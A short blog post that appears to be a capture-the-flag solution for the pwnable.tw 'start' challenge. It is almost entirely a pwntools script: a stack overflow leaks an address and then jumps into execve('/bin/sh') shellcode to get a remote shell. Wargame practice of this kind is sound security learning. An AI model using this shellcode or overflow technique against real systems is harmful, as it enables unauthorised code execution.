
[pwnable.tw] start

lok2h4rd 2024. 1. 4. 22:53
from pwn import *

context.log_level = "debug"

p = remote("chall.pwnable.tw", 10000)
#p = process("./start")

ret = 0x0804809c
main = 0x08048087


leak = b"A" * 0x14
leak += p32(main)
#leak += p32(ret)

p.recvuntil(b":")
p.send(leak)
sleep(0.1)
shell_addr = u32(p.recv(4))
log.info("shell code addr: " + hex(shell_addr))


shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


payload = b"A" * 0x14
payload += p32(shell_addr + 0x14)
payload += shell

sleep(1)
p.send(payload)

p.interactive()


I have about two months left until I'm discharged, and I probably won't do many wargames once I'm back at school, so I'm thinking of working hard (?) through pwnable.tw until then.